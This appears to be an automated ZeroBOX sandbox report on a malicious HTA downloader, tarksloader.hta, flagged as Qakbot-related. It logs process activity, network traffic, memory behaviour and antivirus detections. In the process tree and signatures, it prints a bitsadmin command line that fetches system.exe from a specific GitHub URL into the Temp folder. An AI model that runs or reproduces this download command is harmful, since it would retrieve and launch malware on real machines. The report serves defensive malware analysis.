Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 27, 2025, 10:26 a.m.	March 27, 2025, 10:32 a.m.

Size	944.0B
Type	HTML document, ASCII text, with CRLF line terminators
MD5	`cc3c0e6f75302fb6c2d9b5e7f487efe8`
SHA256	`354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9`
CRC32	`E813AF02`
ssdeep	`24:hMNmMvy4GqptEIjb18qeORVp8xuY8yu5yEl88e/hM8E4olEC:ImMqopOIjb17d4ucD6t40F`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\tarksloader.hta
2056
- bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\test22\AppData\Local\Temp\system.exe
  2176

Name	Response	Post-Analysis Lookup
github.com	A 20.200.245.247	20.200.245.247

IP Address	Status	Action
164.124.101.2	Active	Moloch
20.200.245.247	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 20.200.245.247:443 -> 192.168.56.103:49164	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Command line console output was observed (34 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: ERROR console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: Unable to complete transfer. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: ERROR FILE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/ console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: ERROR CODE: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: 0x80072f7d - 보안 채널 지원에서 오류가 발생했습니다. console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: ERROR CONTEXT: console_handle: 0x00000007	1	1
WriteConsoleW March 27, 2025, 10:26 a.m.	buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 27, 2025, 10:26 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (15 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x033e2000 process_handle: 0xffffffff	1

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 27, 2025, 10:26 a.m.	show_type: 0 filepath_r: bitsadmin parameters: /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\test22\AppData\Local\Temp\system.exe filepath: bitsadmin	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 27, 2025, 10:26 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x033e0000 process_handle: 0xffffffff	1	0	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\test22\AppData\Local\Temp\system.exe
cmdline	"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\test22\AppData\Local\Temp\system.exe

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

CTX	vba.bot.generic
VIPRE	Generic.HTA.Qakbot.H.17EC50FD
Arcabit	Generic.HTA.Qakbot.H.17EC50FD
Symantec	CL.Downloader!gen92
ESET-NOD32	VBS/TrojanDownloader.Agent.WUN
TrendMicro-HouseCall	Possible_SMHANCITORGMNE
Avast	VBS:Runner-NG [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	Generic.HTA.Qakbot.H.17EC50FD
NANO-Antivirus	Trojan.Script.Downloader.kslccp
MicroWorld-eScan	Generic.HTA.Qakbot.H.17EC50FD
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:eqceN2cLLcS)
Emsisoft	Generic.HTA.Qakbot.H.17EC50FD (B)
TrendMicro	Possible_SMHANCITORGMNE
Ikarus	Trojan-Downloader.VBS.Agent
FireEye	Generic.HTA.Qakbot.H.17EC50FD
Google	Detected
GData	Generic.HTA.Qakbot.H.17EC50FD
Varist	JS/Agent.ATW!Eldorado
Tencent	Vbs.Trojan-Downloader.Der.Ddhl
huorong	TrojanDownloader/VBS.NetLoader.ad
Fortinet	VBS/Agent.VHJ!tr.dldr
AVG	VBS:Runner-NG [Trj]

tarksloader.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All